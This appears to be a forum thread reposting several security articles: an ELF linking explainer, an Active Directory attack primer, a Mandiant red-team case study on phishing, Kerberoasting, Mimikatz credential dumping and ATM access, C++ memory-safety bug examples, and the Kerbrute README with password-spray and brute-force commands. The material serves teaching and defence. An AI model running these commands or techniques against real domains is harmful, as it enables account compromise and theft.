    Remember from above, when I told you that the first entry is special. It is because here where the dynamic linker is called to resolve the external symbols and relocate them. To do that, we jump to the address contained in the address 601010 in the got table. These address should contain the address of the dynamic linker routine to handle the relocation. Right now these entry is filled with 0’s, but this address is filled by the linker when the program actually runs and the kernel calls the dynamic linker.

    When the routine is called, linker would resolve the symbol that was pushed earlier(in our case, 0), from external shared objects and put the correct address of the symbol in the got table. So, from now on, when the printf function is called, we don’t have to consult the linker, we can directly jump from plt to our printf function in the C library.

    This process is called lazy loading. A program may contain many external symbols, but it may not call of them in one run of the program. So, the symbols resolution is deferred till the actual use and this save us some program startup time.

    As you can see from the above discussion, we never had to modify the plt section, but only the got section. And that is why plt section is in the first LOAD segment and marked as Read only, while got section is in the second LOAD segment and marked Write.

    And this is how dynamic linker works. I have skipped over lots of gory details but if you are interested in knowing in more detail, then you can checkout this article.

    Let’s go back to our program loading. We have already done most of the work. Kernel has loaded all the loadable segments, has invoked the dynamic linker. All that is left is to invoke our main function. And that work is done by the linker after it finishes. And when it calls our main function we get the following output in our terminal-

    3

    And that my friend, is bliss.

    Thank you for reading my article. Let me know if you liked my article or any other suggestions for me, in the comments section below. And please, feel free to share :)

     

    Sursa: https://kishuagarwal.github.io/life-of-a-binary.html

  16. Exploring, Exploiting Active Directory Pen Test

    Active Directory (Pen Test ) is most commonly used in the Enterprise Infrastructure to manage 1000’s of computers in the organization with a single point of control as “Domain Controller”. Performing Penetration Testing of Active Directory is more interesting and are mainly targeted by many APT Groups with a lot of different techniques. We will focus on the basics of Active Directory to understand its components before the attack.

    Understanding the Active Directory and its Components

    Directory Service:

    A Directory Service is a hierarchical structure which map the names of all resources in the network to its network address. It allows store, organize and manage all the network resources and define a naming structure. It makes easier to manage all the devices from a single system

    Active Directory:

    Active Directory is a Microsoft Implementation of Directory services. It follows x.500 specification and it works on the application layer of the OSI model. It allows administrators to control all the users and resources in the network from a single server. It stores information about all the users and resources in the network in a single database Directory Service Database. Active Directory at its uses “Kerberos” for Authentication of the users and LDAP for retrieving the directory information.

    Domain Controller (DC)

    A Domain Controller is a Windows Server running Active Directory Directory Services in a domain. All the users, user’s information, computers and its policies are controlled by a Domain Controller. Every User must authenticate with the “Domain Controller” to access any resource or service in a domain. It defines the policies for all the users what actions needs can be performed and what level of privileges to be granted etc. It makes the life of administrators easy to manage the users and the computers in the network.

    Naming Conventions in AD:

    An Object can be any network resource in the Active Directory Domain. These objects can be Computers, Users, printers etc.

    A Domain is a logical grouping of objects in the organization. It defines the security boundary and allows objects within the boundary to share the data among each other. It stores information about all the objects within the domain in the domain controller.

    A Tree is a collection of one or more domains. All domains within a single tree share a common schema and Global Catalogue which is a Central Repository of information about all the objects.

    A forest is a collection of one or more trees which share a common Directory Schema, Global Catalogue and Configurations across the organization

    Kerberos Authentication:

    Kerberos is an authentication protocol which is used for Single Sign-on (SSO) purposes. The concept of SSO is to authenticate once and use the token to access any service for which you are authorized to.

    image-1.png

    Kerberos Authentication Process follows:

    Step1: The User sends an “Authentication Service Request (AS_REQ)” to “Key Distribution Centre”(KDC) for “Ticket Granting Ticket (TGT)” with the “User Principle Name (UPN)” and current Timestamp which is encrypted with User password.

    Step2: KDC decrypts the request (AS_REQ) with the local copy of the User’s password stored in the database and checks the UPN and Timestamp. After verification, it will respond with a reply (AS_REP). It has two levels of encryption one has TGT which is encrypted with KDC’s password and second is Session Key along with expiry Timestamp is encrypted with hash of the user’s password.

    Step3: Now the User’s machine will cache the TGT and Session Key. This TGT is used when requesting for a service. The session key is being used for further communication with KDC which does not require credentials. All the resources in the domain are available as a service and require service ticket for the same.

    Step4: Now User’s Machine send a request(TGS_REQ) to KDC for Ticket Granting Service(TGS) along with TGT, Service Principle Name(SPN) which contains the name of the service and its IP Address and port number and Timestamp which is encrypted with session key received in Step2.

    Step5: KDC will decrypt the request with User’s Session Key and checks the SPN, Timestamp and TGT which is encrypted with the KDC password. If all the details are valid, it will send a reply (TGS_REP) with the TGS encrypted with the password hash of the service provider, Ticket Expiry Timestamp encrypted with AS_REP Session key.

    Step6: User’s machine will decrypt the request with the session key and extract the TGS ticket. User’s Machine will forward this ticket to the Application as a (AP_REQ), the application decrypts the request with its password and extract the session key and other attributes about the client regarding privileges and groups. It verifies these details and grants the access to the application.

    This is the total process of the Kerberos authentication implemented in the Active Directory.

    Attacks on Kerberos:

    Silver Tickets are the Ticket Granting Service (TGS) which is obtained from the KDC can be forged and is effectively cracked offline to compromise the service machine

    Golden Tickets are the Ticket Granting Ticket (TGT) which is obtained from the KDC on the AS_REP. It can be forged and cracked offline to compromise the KDC

    Roasting AS-REP can be performed when the server disables DONT_REQ_PREAUTH, an attacker can request the KDC on behalf of the machine and crack the password offline

    LDAP is a Lightweights Directory Access Protocol which acts as a communication protocol that defines the methods for accessing the directory services in a domain. It defines the way that data should be presented to the users, it includes various components such as Attributes, Entries, and Directory Information Tree.

    Reconnaissance:

    • SPN Scanning instead of Port Scanning of all the machines

    Active Directory can be enumerated in multiple ways as follows:

    • Active Directory can be enumerated even without a Domain Account
    • Active Directory can be enumerated to gather all the Domain and Forests Information, Forest and Domain Trusts many more things without Admin Rights
    • Active Directory can be enumerated to retrieve Privileges accounts, Access Rights of all groups using PowerView

    Attacks on AD

    • PassTheHash: It is a technique used to pass the NTLM hash of a service to the remote server to login rather than plain text password
    • PassTheCache: Passing the cached credentials of Linux/Unix-based systems which are part of the domain to a windows-based machines to gain access to the system
    • Over-Pass-The-Hash: Obtained NTLM hash can be passed to KDC to grab a valid Kerberos ticket and pass it to another system to gain access

    Maintaining Access in the Domain:

    • DCSync: Requires Domain Admin or Enterprise Admin permission and pull all the password data to sync with another malicious and stay in the domain
    • DCShadow: Allows register a new domain to add new objects into targeted infrastructure

    There are many more attacks can be performed to compromise the objects in the Enterprise Active Directory infrastructure. I have listed most commonly performed attacks. I have covered the basics of Active Directory and its necessary conventions which are necessary to learn before going for pen testing. In the next article, i will explain these attacks in details with practical scenarios.

    Image Ref: https://redmondmag.com/articles/2012/02/01/~/media/ECG/redmondmag/Images/2012/02/0212red_Kerberos_Fig1.ashx

     

    Sursa: http://blog.securelayer7.net/exploring-exploiting-active-directory-pen-test/

    • Like 1
  17. Finding Weaknesses Before the Attackers Do

    This blog post originally appeared as an article in M-Trends 2019.

    FireEye Mandiant red team consultants perform objectives-based assessments that emulate real cyber attacks by advanced and nation state attackers across the entire attack lifecycle by blending into environments and observing how employees interact with their workstations and applications. Assessments like this help organizations identify weaknesses in their current detection and response procedures so they can update their existing security programs to better deal with modern threats.

    A financial services firm engaged a Mandiant red team to evaluate the effectiveness of its information security team’s detection, prevention and response capabilities. The key objectives of this engagement were to accomplish the following actions without detection:

    • Compromise Active Directory (AD): Gain domain administrator privileges within the client’s Microsoft Windows AD environment.
    • Access financial applications: Gain access to applications and servers containing financial transfer data and account management functionality.
    • Bypass RSA Multi-Factor Authentication (MFA): Bypass MFA to access sensitive applications, such as the client’s payment management system.
    • Access ATM environment: Identify and access ATMs in a segmented portion of the internal network.

    Initial Compromise

    Based on Mandiant’s investigative experience, social engineering has become the most common and efficient initial attack vector used by advanced attackers. For this engagement, the red team used a phone-based social engineering scenario to circumvent email detection capabilities and avoid the residual evidence that is often left behind by a phishing email.

    While performing Open-source intelligence (OSINT) reconnaissance of the client’s Internet-facing infrastructure, the red team discovered an Outlook Web App login portal hosted at https://owa.customer.example. The red team registered a look-alike domain (https://owacustomer.example) and cloned the client’s login portal (Figure 1).

    Fig1.png
    Figure 1: Cloned Outlook Web Portal

    After the OWA portal was cloned, the red team identified IT helpdesk and employee phone numbers through further OSINT. Once these phone numbers were gathered, the red team used a publicly available online service to call the employees while spoofing the phone number of the IT helpdesk.

    Mandiant consultants posed as helpdesk technicians and informed employees that their email inboxes had been migrated to a new company server. To complete the “migration,” the employee would have to log into the cloned OWA portal. To avoid suspicion, employees were immediately redirected to the legitimate OWA portal once they authenticated. Using this campaign, the red team captured credentials from eight employees which could be used to establish a foothold in the client’s internal network.

    Establishing a Foothold

    Although the client’s virtual private network (VPN) and Citrix web portals implemented MFA that required users to provide a password and RSA token code, the red team found a singlefactor bring-your-own-device (BYOD) portal (Figure 2).

    Fig2.png
    Figure 2: Single factor mobile device management portal

    Using stolen domain credentials, the red team logged into the BYOD web portal to attempt enrollment of an Android phone for CUSTOMER\user0. While the red team could view user settings, they were unable to add a new device. To bypass this restriction, the consultants downloaded the IBM MaaS360 Android app and logged in via their phone. The device configuration process installed the client’s VPN certificate (Fig. 13), which was automatically imported to the Cisco AnyConnect app—also installed on the phone.

    Fig3.png
    Figure 3: Setting up mobile device management

    After launching the AnyConnect app, the red team confirmed the phone received an IP address on the client’s VPN. Using a generic tethering app from the Google Play store, the red team then tethered a laptop to the phone to access the client’s internal network.

    Escalating Privileges

    Once connected to the internal network, the red team used the Windows “runas” command to launch PowerShell as CUSTOMER\user0 and perform a “Kerberoast” attack. Kerberoasting abuses legitimate features of Active Directory to retrieve service accounts’ ticketgranting service (TGS) tickets and brute-force accounts with weak passwords.

    To perform the attack, the red team queried an Active Directory domain controller for all accounts with a service principal name (SPN). The typical Kerberoast attack would then request a TGS for the SPN of the associated user account. While Kerberos ticket requests are common, the default Kerberoast attack tool generates an increased volume of requests, which is anomalous and could be identified as suspicious. Using a keyword search for terms such as “Admin”, “SVC” and “SQL,” the consultants identified 18 potentially high-value accounts. To avoid detection, the red team retrieved tickets for this targeted subset of accounts and inserted random delays between each request. The Kerberos tickets for these accounts were then uploaded to a Mandiant password-cracking server which successfully brute-forced the passwords of 4 out of 18 accounts within 2.5 hours.

    The red team then compiled a list of Active Directory group memberships for the cracked accounts, uncovering several groups that followed the naming scheme of {ComputerName}_Administrators. The red team confirmed the accounts possessed local administrator privileges to the specified computers by performing a remote directory listing of \\ {ComputerName}\C$. The red team also executed commands on the system using PowerShell Remoting to gain information about logged on users and running software. After reviewing this data, the red team identified an endpoint detection and response (EDR) agent which had the capability to perform in-memory detections that were likely to identify and alert on the execution of suspicious command line arguments and parent/ child process heuristics associated with credential theft.

    To avoid detection, the red team created LSASS process memory dumps by using a custom utility executed via WMI. The red team retrieved the LSASS dump files over SMB and extracted cleartext passwords and NTLM hashes using Mimikatz. The red team performed this process on 10 unique systems identified to potentially have active privileged user sessions. From one of these 10 systems, the red team successfully obtained credentials for a member of the Domain Administrators group.

    With access to this Domain Administrator account, the red team gained full administrative rights for all systems and users in the customer’s domain. This privileged account was then used to focus on accessing several high-priority applications and network segments to demonstrate the risk of such an attack on critical customer assets.

    Accessing High-Value Objectives

    For this phase, the client identified their RSA MFA systems, ATM network and high-value financial applications as three critical objectives for the Mandiant red team to target.

    Targeting Financial Applications

    The red team began this phase by querying Active Directory data for hostnames related to the objectives and found multiple servers and databases that included references to their key financial application. The red team reviewed the files and documentation on financial application web servers and found an authentication og indicating the following users accessed the financial application:

    • CUSTOMER\user1
    • CUSTOMER\user2
    • CUSTOMER\user3
    • CUSTOMER\user4

    The red team navigated to the financial application’s web interface (Figure 4) and found that authentication required an “RSA passcode,” clearly indicating access required an MFA token.

    Fig4.png
    Figure 4: Financial application login portal

    Bypassing Multi-Factor Authentication

    The red team targeted the client’s RSA MFA implementation by searching network file shares for configuration files and IT documentation. In one file share (Figure 5), the red team discovered software migration log files that revealed the hostnames of three RSA servers.

    Fig5.png
    Figure 5: RSA migration logs from \\ CUSTOMER-FS01\ Software

    Next, the red team focused on identifying the user who installed the RSA authentication module. The red team performed a directory listing of the C:\Users and C:\ data folders of the RSA servers, finding CUSTOMER\ CUSTOMER_ADMIN10 had logged in the same day the RSA agent installer was downloaded. Using these indicators, the red team targeted CUSTOMER\ CUSTOMER_ADMIN10 as a potential RSA administrator.

    Fig6.png
    Figure 6: Directory listing output

    By reviewing user details, the red team identified the CUSTOMER\CUSTOMER_ADMIN10 account was actually the privileged account for the corresponding standard user account CUSTOMER\user103. The red team then used PowerView, an open source PowerShell tool, to identify systems in the environment where CUSTOMER\user103 was or had recently logged in (Figure 7).

    Fig7.png
    Figure 7: Running the PowerView Invoke-UserHunter command

    The red team harvested credentials from the LSASS memory of 10.1.33.133 and successfully obtained the cleartext password for CUSTOMER\user103 (Figure 8).

    Fig8.png
    Figure 8: Mimikatz output

    The red team used the credential for CUSTOMER\user103 to login, without MFA, to the web front-end of the RSA security console with administrative rights (Figure 9).

    Fig9.png
    Figure 9: RSA console

    Many organizations have audit procedures to monitor for the creation of new RSA tokens, so the red team decided the stealthiest approach would be to provision an emergency tokencode. However, since the client was using software tokens, the emergency tokens still required a user’s RSA SecurID PIN. The red team decided to target individual users of the financial application and attempt to discover an RSA PIN stored on their workstation.

    While the red team knew which users could access the financial application, they did not know the system assigned to each user. To identify these systems, the red team targeted the users through their inboxes. The red team set a malicious Outlook homepage for the financial application user CUSTOMER\user1 through MAPI over HTTP using the Ruler11 utility. This ensured that whenever the user reopened Outlook on their system, a backdoor would launch.

    Once CUSTOMER\user1 had re-launched Outlook and their workstation was compromised, the red team began enumerating installed programs on the system and identified that the target user used KeePass, a common password vaulting solution.

    The red team performed an attack against KeePass to retrieve the contents of the file without having the master password by adding a malicious event trigger to the KeePass configuration file (Figure 10). With this trigger, the next time the user opened KeePass a comma-separated values (CSV) file was created with all passwords in the KeePass database, and the red team was able to retrieve the export from the user’s roaming profile.

    Fig10.png
    Figure 10: Malicious configuration file

    One of the entries in the resulting CSV file was login credentials for the financial application, which included not only the application password, but also the user’s RSA SecurID PIN. With this information the red team possessed all the credentials needed to access the financial application.

    The red team logged into the RSA Security Console as CUSTOMER\user103 and navigated to the user record for CUSTOMER\user1. The red team then generated an online emergency access token (Figure 11). The token was configured so that the next time CUSTOMER\ user1 authenticated with their legitimate RSA SecurID PIN + tokencode, the emergency access code would be disabled. This was done to remain covert and mitigate any impact to the user’s ability to conduct business.

    Fig11.png
    Figure 11: Emergency access token

    The red team then successfully authenticated to the financial application with the emergency access token (Figure 12).

    Fig12.png
    Figure 12: Financial application accessed with emergency access token

    Accessing ATMs

    The red team’s final objective was to access the ATM environment, located on a separate network segment from the primary corporate domain. First, the red team prepared a list of high-value users by querying the member list of potentially relevant groups such as ATM_ Administrators. The red team then searched all accessible systems for recent logins by these targeted accounts and dumped their passwords from memory.

    After obtaining a password for ATM administrator CUSTOMER\ADMIN02, the red team logged into the client’s internal Citrix portal to access the employee’s desktop. The red team reviewed the administrator’s documentation and determined the client’s ATMs could be accessed through a server named JUMPHOST01, which connected the corporate and ATM network segments. The red team also found a bookmark saved in Internet Explorer for “ATM Management.” While this link could not be accessed directly from the Citrix desktop, the red team determined it would likely be accessible from JUMPHOST01.

    The jump server enforced MFA for users attempting to RDP into the system, so the red team used a previously compromised domain administrator account, CUSTOMER\ ADMIN01, to execute a payload on JUMPHOST01 through WMI. WMI does not support MFA, so the red team was able to establish a connection between JUMPHOST01 and the red team’s CnC server, create a SOCKS proxy, and access the ATM Management application without an RSA pin. The red team successfully authenticated to the ATM Management application and could then dispense money, add local administrators, install new software and execute commands with SYSTEM privileges on all ATM machines (Figure 13).

    Fig13.png
    Figure 13: Executing commands on ATMs as SYSTEM

    Takeaways: Multi-Factor Authentication, Password Policy and Account Segmentation

    Multi-Factor Authentication

    Mandiant experts have seen a significant uptick in the number of clients securing their VPN or remote access infrastructure with MFA. However, there is frequently a lack of MFA for applications being accessed from within the internal corporate network. Therefore, FireEye recommends that customers enforce MFA for all externally accessible login portals and for any sensitive internal applications.

    Password Policy

    During this engagement, the red team compromised four privileged service accounts due to the use of weak passwords which could be quickly brute forced. FireEye recommends that customers enforce strong password practices for all accounts. Customers should enforce a minimum of 20-character passwords for service accounts. When possible, customers should also use Microsoft Managed Service Accounts (MSAs) or enterprise password vaulting solutions to manage privileged users.

    Account Segmentation

    Once the red team obtained initial access to the environment, they were able to escalate privileges in the domain quickly due to a lack of account segmentation. FireEye recommends customers follow the “principle of least-privilege” when provisioning accounts. Accounts should be separated by role so normal users, administrative users and domain administrators are all unique accounts even if a single employee needs one of each. 

    Normal user accounts should not be given local administrator access without a documented business requirement. Workstation administrators should not be allowed to log in to servers and vice versa. Finally, domain administrators should only be permitted to log in to domain controllers, and server administrators should not have access to those systems. By segmenting accounts in this way, customers can greatly increase the difficulty of an attacker escalating privileges or moving laterally from a single compromised account.

    Conclusion

    As demonstrated in this case study, the Mandiant red team was able to gain a foothold in the client’s environment, obtain full administrative control of the company domain and compromise all critical business applications without any software or operating system exploits. Instead, the red team focused on identifying system misconfigurations, conducting social engineering attacks and using the client’s internal tools and documentation. The red team was able to achieve their objectives due to the configuration of the client’s MFA, service account password policy and account segmentation.

     

    Sursa: https://www.fireeye.com/blog/threat-research/2019/04/finding-weaknesses-before-the-attackers-do.html

    • Haha 1
  18. Modern C++ Won't Save Us

    2019-04-21 by alex_gaynor

    I'm a frequent critic of memory unsafe languages, principally C and C++, and how they induce an exceptional number of security vulnerabilities. My conclusion, based on reviewing evidence from numerous large software projects using C and C++, is that we need to be migrating our industry to memory safe by default languages (such as Rust and Swift). One of the responses I frequently receive is that the problem isn't C and C++ themselves, developers are simply holding them wrong. In particular, I often receive defenses of C++ of the form, "C++ is safe if you don't use any of the functionality inherited from C"1 or similarly that if you use modern C++ types and idioms you will be immune from the memory corruption vulnerabilities that plague other projects.

    I would like to credit C++'s smart pointer types, because they do significantly help. Unfortunately, my experience working on large C++ projects which use modern idioms is that these are not nearly sufficient to stop the flood of vulnerabilities. My goal for the remainder of this post is to highlight a number of completely modern C++ idioms which produce vulnerabilities.

    Hide the reference use-after-free

    The first example I'd like to describe, originally from Kostya Serebryany, is how C++'s std::string_view can make it easy to hide use-after-free vulnerabilities:

    #include <iostream>
    #include <string>
    #include <string_view>
    
    int main() {
      std::string s = "Hellooooooooooooooo ";
      std::string_view sv = s + "World\n";
      std::cout << sv;
    }
    

    What's happening here is that s + "World\n" allocates a new std::string, and then is converted to a std::string_view. At this point the temporary std::string is freed, but sv still points at the memory that used to be owned by it. Any future use of sv is a use-after-free vulnerability. Oops! C++ lacks the facilities for the compiler to be aware that sv captures a reference to something where the reference lives longer than the referent. The same issue impacts std::span, also an extremely modern C++ type.

    Another fun variant involves using C++'s lambda support to hide a reference:

    #include <memory>
    #include <iostream>
    #include <functional>
    
    
    std::function<int(void)> f(std::shared_ptr<int> x) {
        return [&]() { return *x; };
    }
    
    int main() {
        std::function<int(void)> y(nullptr);
        {
            std::shared_ptr<int> x(std::make_shared<int>(4));
            y = f(x);
        }
        std::cout << y() << std::endl;
    }
    

    Here the [&] in f causes the lambda to capture values by reference. Then in main x goes out of scope, destroying the last reference to the data, and causing it to be freed. At this point y contains a dangling pointer. This occurs despite our meticulous use of smart pointers throughout. And yes, people really do write code that handles std::shared_ptr<T>&, often as an attempt to avoid additional increment and decrements on the reference count.

    std::optional<T> dereference

    std::optional represents a value that may or may not be present, often replacing magic sentinel values (such as -1 or nullptr). It offers methods such as value(), which extract the T it contains and raises an exception if the the optional is empty. However, it also defines operator* and operator->. These methods also provide access to the underlying T, however they do not check if the optional actually contains a value or not.

    The following code for example, simply returns an uninitialized value:

    #include <optional>
    
    int f() {
        std::optional<int> x(std::nullopt);
        return *x;
    }
    

    If you use std::optional as a replacement for nullptr this can produce even more serious issues! Dereferencing a nullptr gives a segfault (which is not a security issue, except in older kernels). Dereferencing a nullopt however, gives you an uninitialized value as a pointer, which can be a serious security issue. While having a T* with an uninitialized value is also possible, these are much less common than dereferencing a pointer that was correctly initialized to nullptr.

    And no, this doesn't require you to be using raw pointers. You can get uninitialized/wild pointers with smart pointers as well:

    #include <optional>
    #include <memory>
    
    std::unique_ptr<int> f() {
        std::optional<std::unique_ptr<int>> x(std::nullopt);
        return std::move(*x);
    }
    

    std::span<T> indexing

    std::span<T> provides an ergonomic way to pass around a reference to a contiguous slice of memory and a length. This lets you easily write code that works over multiple different types; a std::span<uint8_t> can point to memory owned by a std::vector<uint8_t>, a std::array<uint8_t, N>, or even a raw pointer. Failure to correctly check bounds is a frequent source of security vulnerabilities, and in many senses span helps out with this by ensuring you always have a length handy.

    Like all STL data structures, span's operator[] method does not perform any bounds checks. This is regrettable, since operator[] is the most ergonomic and default way people use data structures. std::vector and std::array can at least theoretically be used safely because they offer an at() method which is bounds checked (in practice I've never seen this done, but you could imagine a project adopting a static analysis tool which simply banned calls to std::vector<T>::operator[]). span does not offer an at() method, or any other method which performs a bounds checked lookup.

    Interestingly, both Firefox and Chromium's backports of std::span do perform bounds checks in operator[], and thus they'll never be able to safely migrate to std::span.

    Conclusion

    Modern C++ idioms introduce many changes which have the potential to improve security: smart pointers better express expected lifetimes, std::span ensures you always have a correct length handy, std::variant provides a safer abstraction for unions. However modern C++ also introduces some incredible new sources of vulnerabilities: lambda capture use-after-free, uninitialized-value optionals, and un-bounds-checked span.

    My professional experience writing relatively modern C++, and auditing Rust code (including Rust code that makes significant use of unsafe) is that the safety of modern C++ is simply no match for memory safe by default languages like Rust and Swift (or Python and Javascript, though I find it rare in life to have a program that makes sense to write in either Python or C++).

    There are significant challenges to migrating existing, large, C and C++ codebases to a different language -- no one can deny this. Nonetheless, the question simply must be how we can accomplish it, rather than if we should try. Even with the most modern C++ idioms available, the evidence is clear that, at scale, it's simply not possible to hold C++ right.

    [1] I understood this to be referring to raw pointers, arrays-as-pointers, manual malloc/free, and other similar features. However I think it's worth acknowledging that given that C++ explicitly incorporated C into its specification, in practice most C++ code incorporates some of these elements.

    about.jpg

    Hi, I'm Alex. I'm currently at a startup called Alloy. Before that I was a engineer working on Firefox security and before that at the U.S. Digital Service. I'm an avid open source contributor and live in Washington, DC.

     

     

     

     

    Sursa: https://alexgaynor.net/2019/apr/21/modern-c++-wont-save-us/

    • Thanks 1
  19. Debugger for .NET Core runtime

    The debugger provides GDB/MI or VSCode Debug Adapter protocol and allows to debug .NET apps under .NET Core runtime.

    Build

    Switch to netcoredbg directory, create build directory and switch into it:

    mkdir build
    cd build
    

    Proceed to build with cmake.

    Necessary dependencies (CoreCLR sources and .NET SDK binaries) are going to be downloaded during CMake configure step. It is possible to override them with CMake options -DCORECLR_DIR=<path-to-coreclr> and -DDOTNET_DIR=<path-to-dotnet-sdk>.

    Ubuntu

    CC=clang CXX=clang++ cmake .. -DCMAKE_INSTALL_PREFIX=$PWD/../bin
    

    macOS

    cmake .. -DCMAKE_INSTALL_PREFIX=$PWD/../bin
    

    Windows

    cmake .. -G "Visual Studio 15 2017 Win64" -DCMAKE_INSTALL_PREFIX="$pwd\..\bin"
    

    Compile and install:

    cmake --build . --target install
    

    Run

    The above commands create bin directory with netcoredbg binary and additional libraries.

    Now running the debugger with --help option should look like this:

    $ ../bin/netcoredbg --help
    .NET Core debugger
    
    Options:
    --attach <process-id>                 Attach the debugger to the specified process id.
    --interpreter=mi                      Puts the debugger into MI mode.
    --interpreter=vscode                  Puts the debugger into VS Code Debugger mode.
    --engineLogging[=<path to log file>]  Enable logging to VsDbg-UI or file for the engine.
                                          Only supported by the VsCode interpreter.
    --server[=port_num]                   Start the debugger listening for requests on the
                                          specified TCP/IP port instead of stdin/out. If port is not specified
                                          TCP 4711 will be used.
    

     

    Sursa: https://github.com/Samsung/netcoredbg

    • Upvote 1
  20. Kerbrute

    A tool to quickly bruteforce and enumerate valid Active Directory accounts through Kerberos Pre-Authentication

    Grab the latest binaries from the releases page to get started.

    Background

    This tool grew out of some bash scripts I wrote a few years ago to perform bruteforcing using the Heimdal Kerberos client from Linux. I wanted something that didn't require privileges to install a Kerberos client, and when I found the amazing pure Go implementation of Kerberos gokrb5, I decided to finally learn Go and write this.

    Bruteforcing Windows passwords with Kerberos is much faster than any other approach I know of, and potentially stealthier since pre-authentication failures do not trigger that "traditional" An account failed to log on event 4625. With Kerberos, you can validate a username or test a login by only sending one UDP frame to the KDC (Domain Controller)

    For more background and information, check out my Troopers 2019 talk, Fun with LDAP and Kerberos (link TBD)

    Usage

    Kerbrute has three main commands:

    • bruteuser - Bruteforce a single user's password from a wordlist
    • passwordspray - Test a single password against a list of users
    • usernenum - Enumerate valid domain usernames via Kerberos

    A domain (-d) or a domain controller (--dc) must be specified. If a Domain Controller is not given the KDC will be looked up via DNS.

    By default, Kerbrute is multithreaded and uses 10 threads. This can be changed with the -t option.

    Output is logged to stdout, but a log file can be specified with -o.

    By default, failures are not logged, but that can be changed with -v.

    Lastly, Kerbrute has a --safe option. When this option is enabled, if an account comes back as locked out, it will abort all threads to stop locking out any other accounts.

    The help command can be used for more information

    $ ./kerbrute
    
        __             __               __
       / /_____  _____/ /_  _______  __/ /____
      / //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \
     / ,< /  __/ /  / /_/ / /  / /_/ / /_/  __/
    /_/|_|\___/_/  /_.___/_/   \__,_/\__/\___/
    
    Version: v1.0.0 (43f9ca1) - 03/06/19 - Ronnie Flathers @ropnop
    
    This tool is designed to assist in quickly bruteforcing valid Active Directory accounts through Kerberos Pre-Authentication.
    It is designed to be used on an internal Windows domain with access to one of the Domain Controllers.
    Warning: failed Kerberos Pre-Auth counts as a failed login and WILL lock out accounts
    
    Usage:
      kerbrute [command]
    
    Available Commands:
      bruteuser     Bruteforce a single user's password from a wordlist
      help          Help about any command
      passwordspray Test a single password against a list of users
      userenum      Enumerate valid domain usernames via Kerberos
      version       Display version info and quit
    
    Flags:
          --dc string       The location of the Domain Controller (KDC) to target. If blank, will lookup via DNS
      -d, --domain string   The full domain to use (e.g. contoso.com)
      -h, --help            help for kerbrute
      -o, --output string   File to write logs to. Optional.
          --safe            Safe mode. Will abort if any user comes back as locked out. Default: FALSE
      -t, --threads int     Threads to use (default 10)
      -v, --verbose         Log failures and errors
    
    Use "kerbrute [command] --help" for more information about a command.
    

    User Enumeration

    To enumerate usernames, Kerbrute sends TGT requests with no pre-authentication. If the KDC responds with a PRINCIPAL UNKNOWN error, the username does not exist. However, if the KDC prompts for pre-authentication, we know the username exists and we move on. This does not cause any login failures so it will not lock out any accounts. This generates a Windows event ID 4768 if Kerberos logging is enabled.

    root@kali:~# ./kerbrute_linux_amd64 userenum -d lab.ropnop.com usernames.txt
    
        __             __               __
       / /_____  _____/ /_  _______  __/ /____
      / //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \
     / ,< /  __/ /  / /_/ / /  / /_/ / /_/  __/
    /_/|_|\___/_/  /_.___/_/   \__,_/\__/\___/
    
    Version: dev (43f9ca1) - 03/06/19 - Ronnie Flathers @ropnop
    
    2019/03/06 21:28:04 >  Using KDC(s):
    2019/03/06 21:28:04 >   pdc01.lab.ropnop.com:88
    
    2019/03/06 21:28:04 >  [+] VALID USERNAME:       amata@lab.ropnop.com
    2019/03/06 21:28:04 >  [+] VALID USERNAME:       thoffman@lab.ropnop.com
    2019/03/06 21:28:04 >  Done! Tested 1001 usernames (2 valid) in 0.425 seconds
    

    Password Spray

    With passwordwpray, Kerbrute will perform a horizontal brute force attack against a list of domain users. This is useful for testing one or two common passwords when you have a large list of users. WARNING: this does will increment the failed login count and lock out accounts. This will generate both event IDs 4768 - A Kerberos authentication ticket (TGT) was requested and 4771 - Kerberos pre-authentication failed

    root@kali:~# ./kerbrute_linux_amd64 passwordspray -d lab.ropnop.com domain_users.txt Password123
    
        __             __               __
       / /_____  _____/ /_  _______  __/ /____
      / //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \
     / ,< /  __/ /  / /_/ / /  / /_/ / /_/  __/
    /_/|_|\___/_/  /_.___/_/   \__,_/\__/\___/
    
    Version: dev (43f9ca1) - 03/06/19 - Ronnie Flathers @ropnop
    
    2019/03/06 21:37:29 >  Using KDC(s):
    2019/03/06 21:37:29 >   pdc01.lab.ropnop.com:88
    
    2019/03/06 21:37:35 >  [+] VALID LOGIN:  callen@lab.ropnop.com:Password123
    2019/03/06 21:37:37 >  [+] VALID LOGIN:  eshort@lab.ropnop.com:Password123
    2019/03/06 21:37:37 >  Done! Tested 2755 logins (2 successes) in 7.674 seconds
    

    Brute User

    This is a traditional bruteforce account against a username. Only run this if you are sure there is no lockout policy! This will generate both event IDs 4768 - A Kerberos authentication ticket (TGT) was requested and 4771 - Kerberos pre-authentication failed

    root@kali:~# ./kerbrute_linux_amd64 bruteuser -d lab.ropnop.com passwords.lst thoffman
    
        __             __               __
       / /_____  _____/ /_  _______  __/ /____
      / //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \
     / ,< /  __/ /  / /_/ / /  / /_/ / /_/  __/
    /_/|_|\___/_/  /_.___/_/   \__,_/\__/\___/
    
    Version: dev (43f9ca1) - 03/06/19 - Ronnie Flathers @ropnop
    
    2019/03/06 21:38:24 >  Using KDC(s):
    2019/03/06 21:38:24 >   pdc01.lab.ropnop.com:88
    
    2019/03/06 21:38:27 >  [+] VALID LOGIN:  thoffman@lab.ropnop.com:Summer2017
    2019/03/06 21:38:27 >  Done! Tested 1001 logins (1 successes) in 2.711 seconds
    

    Installing

    You can download pre-compiled binaries for Linux, Windows and Mac from the releases page. If you want to live on the edge, you can also install with Go:

    $ go get github.com/ropnop/kerbrute
    

    With the repository cloned, you can also use the Make file to compile for common architectures:

    $ make help
    help:            Show this help.
    windows:  Make Windows x86 and x64 Binaries
    linux:  Make Linux x86 and x64 Binaries
    mac:  Make Darwin (Mac) x86 and x64 Binaries
    clean:  Delete any binaries
    all:  Make Windows, Linux and Mac x86/x64 Binaries
    
    $ make all
    Done.
    Building for windows amd64..
    Building for windows 386..
    Done.
    Building for linux amd64...
    Building for linux 386...
    Done.
    Building for mac amd64...
    Building for mac 386...
    Done.
    
    $ ls dist/
    kerbrute_darwin_386        kerbrute_linux_386         kerbrute_windows_386.exe
    kerbrute_darwin_amd64      kerbrute_linux_amd64       kerbrute_windows_amd64.exe
    

    Credits

